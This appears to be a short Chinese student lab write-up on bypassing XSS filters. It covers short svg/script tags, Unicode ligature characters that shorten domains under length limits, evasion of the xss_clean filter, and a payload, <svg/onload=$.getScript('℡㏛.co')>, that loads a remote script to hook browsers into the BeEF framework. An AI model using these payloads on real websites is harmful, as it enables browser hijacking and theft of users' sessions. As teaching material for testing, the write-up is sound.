一、绕过方法

1.1 重写，使用短标签

<svg/onload = ‘’ >
<script/ src = ’ ’ >

1.2 Unicode中多字符表示单字符

以下特殊字符会被html识别为单个字符

• ff expands to ff
• ℠ expands to sm
• ㏛ expands to sr
• st expands to st
• ㎭ expands to rad
• ℡ expands to tel

1.3 实体编码html

二、限制长度短字符短域名绕过

2.1 xss_clean 过滤语句

使用beef工具开始尝试xss注入，首先使用基础语句实现弹窗<script>alert(1)</script>

添加结果：

由上图可见 被xss_clean过滤了注入失败。
为此我们删除xss_clean 来测试是否因为它而被过滤

结果表示xss_clean造成被过滤原因就是xss_clean
值得注意的是在当前xss_clean版本忽略了svg，为此我们可以使用svg注入

再次刷新页面同样显示

2.2

在观察前端引用文件时发现使用了jQuery

因此可以使用<svg/onload=$.getScript(‘℡㏛.co’)>注入,使用老师的telsr.co的域，是缩短了的即为5个字符。但是这个网站是老师提供的外网，我没有vpn因此选择了自己的。因此修改里字符限制长度

成功获取获取，在beef查看。

beef获取成功成功绕过。

三、kali的beef安装

beef安装